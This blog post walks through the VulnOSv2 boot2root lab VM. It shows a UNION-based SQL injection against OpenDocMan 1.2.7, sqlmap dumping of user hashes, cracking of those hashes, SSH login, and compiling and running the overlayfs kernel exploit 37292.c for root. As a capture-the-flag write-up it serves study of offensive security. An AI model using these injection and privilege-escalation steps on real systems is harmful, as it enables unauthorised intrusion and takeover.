5 December 2022

Pentesting Fun Stuff

following the cyber security path…

VulnOSv2

This is another boot2root from my OSCP list hosted by vulnhub.com and TryHackMe.com.
The challenge is as follows: “Your assignment is to pentest a company website, get root of the system and read the final flag”
So let’s get cracking.

Converting

This VM was created in Virtualbox and exported as .vdi
I use VMware and VMware doesn’t play with vdi. So what to do besides installing Virtualbox?

Here is how:

First I download a program called qemu-img

root@redteam:~# apt install qemu-utils qemu-block-extra -y

Then I download the VM from vulnhub.com and extract the 7z file.

root@redteam:~/Downloads# 7z x VulnOSv2.7z 

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-6500U CPU @ 2.50GHz (406E3),ASM,AES-NI)

Scanning the drive for archives:
1 file, 799933398 bytes (763 MiB)

Extracting archive: VulnOSv2.7z
--
Path = VulnOSv2.7z
Type = 7z
Physical Size = 799933398
Headers Size = 240
Method = LZMA:25 BCJ
Solid = +
Blocks = 2

Everything is Ok              

Folders: 1
Files: 3
Size:       2998942644
Compressed: 799933398

When that is done, run the following command to convert the vdi file to an vmdk file

root@redteam:~/Downloads/VulnOSv2# qemu-img convert -f vdi -O vmdk VulnOSv2.vdi VulnOSv2.vmdk
root@redteam:~/Downloads/VulnOSv2# ls
VulnOSv2.vbox  VulnOSv2.vbox-prev  VulnOSv2.vdi  VulnOSv2.vmdk

And there you have it. Now you can create a new VM in VMware and replace the HDD with this vmdk.

Ok now that this VM runs in VMware I can start.

Recon

Starting with a nmap scan.

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
|   2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
|   256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
|_  256 71:bc:6b:7b:56:02:a4:8e:ce:1c:8e:a6:1e:3a:37:94 (ED25519)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: VulnOSv2
6667/tcp open  irc     ngircd
MAC Address: 00:0C:29:83:0D:CE (VMware)
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap found the following ports/services:

  • SSH server running on port 22, version 6.6.1p1
  • Apache HTTP server, version 2.4.7
  • IRC server

Nmap also thinks it runs on Ubuntu.

SSH ~ first try

There are newer versions, but this one doesn’t look like it’s vulnerable.

root@redteam:~/Downloads/VulnOSv2# ssh 192.168.50.138
The authenticity of host '192.168.50.138 (192.168.50.138)' can't be established.
ECDSA key fingerprint is SHA256:nIyyJRPJMy1g6F5m8AIT7W//x6lj3ZqhUbYuvSafKeI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.50.138' (ECDSA) to the list of known hosts.
root@192.168.50.138's password:

Also there is no banner, which sometimes give useful information.

HTTP

When browsing to the IP address there is the same information as was in the description on vulnhub.com
There is also a link to the main webpage of the mentioned company.

At the bottom of the page there is a footer: 2019 © Vulnerable since 1980
That’s a nice statement and also it let me to believe the IRC server is the real culprit here…..but first things first.
Also the favicon is that of drupal. Maybe there is a login page and it’s more then just a static site.

On the Documentation there is a nifty piece of security.

Looks like there is nothing…..but then

Like I said….nifty security. Of course this text is visible in the source code, but this was more fun to show.
So let’s take a look at /jabcd0cs/

When visiting this page I get a login section and a software name + version: OpenDocMan v1.2.7

root@redteam:~/Downloads/VulnOSv2# searchsploit opendocman 1.2.7
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                            |  Path
                                                                                                                                                                          | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
OpenDocMan 1.2.7 - Multiple Vulnerabilities                                                                                                                               | exploits/php/webapps/32075.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

The vulnerabilities are:

  • SQL Injection
  • Improper Access Control

I try the SQL injection first. The vulnerability exists in the improper validation of the add_value parameter

http://192.168.50.138/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9
GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user HTTP/1.1
Host: 192.168.50.138
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: SpryMedia_DataTables_filetable_out.php=%7B%22iCreate%22%3A1559305767887%2C%22iStart%22%3A0%2C%22iEnd%22%3A6%2C%22iLength%22%3A10%2C%22sFilter%22%3A%22%22%2C%22sFilterEsc%22%3Atrue%2C%22aaSorting%22%3A%5B%20%5B0%2C%22asc%22%5D%5D%2C%22aaSearchCols%22%3A%5B%20%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%5D%2C%22abVisCols%22%3A%5B%20true%2Ctrue%2Ctrue%2Ctrue%2Ctrue%2Ctrue%2Ctrue%2Ctrue%2Ctrue%2Ctrue%2Ctrue%5D%7D; has_js=1; PHPSESSID=p5okl28r5bjd8o60sleb0n4ds4
Connection: close
Upgrade-Insecure-Requests: 1

With Burp I captured the HTTP header so I can run it through SQLmap.

When injecting the URL parameter I can retrieve the current user on which this program runs.

With other words, this software runs as root on the local system. Never a good idea, because when you can compromise the program, you compromise the system immediately on root level.
For now I would like to get the username/password table. For this task I use sqlmap

After it ran I found the usernames from database jabcd0cs

Database: jabcd0cs
Table: odm_user
[3 entries]
+----------+
| username |
+----------+
| guest    |
| n0w4n    |
| webmin   |
+----------+

The passwords were stored as hashes and only 2 were known for their plaintext strings.

Database: jabcd0cs                                                                                     
Table: odm_user
[3 entries]
+------------------------------------------+
| password                                 |
+------------------------------------------+
| 084e0343a0486ff05530df6c705c8bb4 (guest) |
| 1a1dc91c907325c69271ddf0c944bc72 (pass)  |
| b78aae356709f8c31118ea613980954b         |
+------------------------------------------+

There is a nice python script, which can be found on github, that can help you when you’re stuck with a hash.

root@redteam:~/Hash-Buster# python3 hash.py -s b78aae356709f8c31118ea613980954b
_  _ ____ ____ _  _    ___  _  _ ____ ___ ____ ____
|__| |__| [__  |__|    |__] |  | [__   |  |___ |__/
|  | |  | ___] |  |    |__] |__| ___]  |  |___ |  \  v3.0

[!] Hash function : MD5
webmin1980

And there is the joke of the footer found earlier.

SSH ~ second try

root@redteam:~# ssh webmin@192.168.50.138
webmin@192.168.50.138's password: 
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Fri May 31 15:33:28 CEST 2019

  System load: 0.0               Memory usage: 4%   Processes:       65
  Usage of /:  5.7% of 29.91GB   Swap usage:   0%   Users logged in: 0

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Wed May  4 10:41:07 2016
$ id
uid=1001(webmin) gid=1001(webmin) groups=1001(webmin)

Now for some system recon.

$ python -c 'import pty;pty.spawn("/bin/bash");'
webmin@VulnOSv2:~$ pwd
/home/webmin
webmin@VulnOSv2:~$ ls -lah
total 596K
drwxr-x--- 3 webmin webmin 4.0K May  3  2016 .
drwxr-xr-x 4 root   root   4.0K Apr 16  2016 ..
-rw------- 1 webmin webmin   85 May  4  2016 .bash_history
-rw-r--r-- 1 webmin webmin  220 Apr  9  2014 .bash_logout
-rw-r--r-- 1 webmin webmin 3.6K Apr  9  2014 .bashrc
drwx------ 2 webmin webmin 4.0K Apr 30  2016 .cache
-rw-rw-r-- 1 webmin webmin 566K Apr 30  2016 post.tar.gz
-rw-r--r-- 1 webmin webmin  675 Apr  9  2014 .profile

In the users home folder there is a tarball. To get it onto my system I run a python http server (as python is installed on this system).
And collect the file by curling it and piping it straight to tar to extract the content.

It looks like the files needed to run hydra. Not very useful at the moment.
To do a faster scan of the system I use a recon bash script called LinEnum.

webmin@VulnOSv2:~$ uname -r
3.13.0-24-generic
webmin@VulnOSv2:~$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.4 LTS"
NAME="Ubuntu"
VERSION="14.04.4 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.4 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

Looks like an old kernel which probably has some vulnerabilities.

root@redteam:~# searchsploit kernel 3.13
--------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                 |  Path
                                                               | (/usr/share/exploitdb/)
--------------------------------------------------------------- ----------------------------------------
Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Deni | exploits/osx/dos/8264.c
Apple Mac OSX xnu 1228.3.13 - 'macfsstat' Local Kernel Memory  | exploits/osx/dos/8263.c
Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overf | exploits/osx/dos/8262.c
Apple Mac OSX xnu 1228.3.13 - IPv6-ipcomp Remote kernel Denial | exploits/multiple/dos/5191.c
Linux Kernel 3.13 - SGID Privilege Escalation                  | exploits/linux/local/33824.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) -  | exploits/linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) -  | exploits/linux/local/37293.txt
Linux Kernel 3.13.1 - 'Recvmmsg' Local Privilege Escalation (M | exploits/linux/local/40503.rb
Linux Kernel 3.13/3.14 (Ubuntu) - 'splice()' System Call Local | exploits/linux/dos/36743.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X | exploits/linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Ar | exploits/linux/local/31346.c
Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat (PoC)          | exploits/linux/dos/31305.c
--------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Because of the kernel and the OS being Ubuntu there is a good change the exploit is the overlayfs exploit.
To exploit it I copy 37292.c to the remote system and compile it.

webmin@VulnOSv2:/tmp$ gcc kernel.c -o kernel
webmin@VulnOSv2:/tmp$ ls -lah
total 28K
drwxrwxrwx  2 root   root   4.0K May 31 15:41 .
drwxr-xr-x 21 root   root   4.0K Apr  3  2016 ..
-rwxrwxr-x  1 webmin webmin  12K May 31 15:41 kernel
-rw-rw-r--  1 webmin webmin 5.0K May 31 15:38 kernel.c
webmin@VulnOSv2:/tmp$ ./kernel
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(webmin)

After compiling and running the program I got my privileges escalated to root. Now for the flag.

# cd /root
# ls
flag.txt
# cat flag.txt	
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.

What do you think of A.I.?

Conclusion

This was a fun challenge to try.
I don’t have more challenges of the vulnOS series in my list. But I think I’ll definitely give another one a shot.

 

 

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.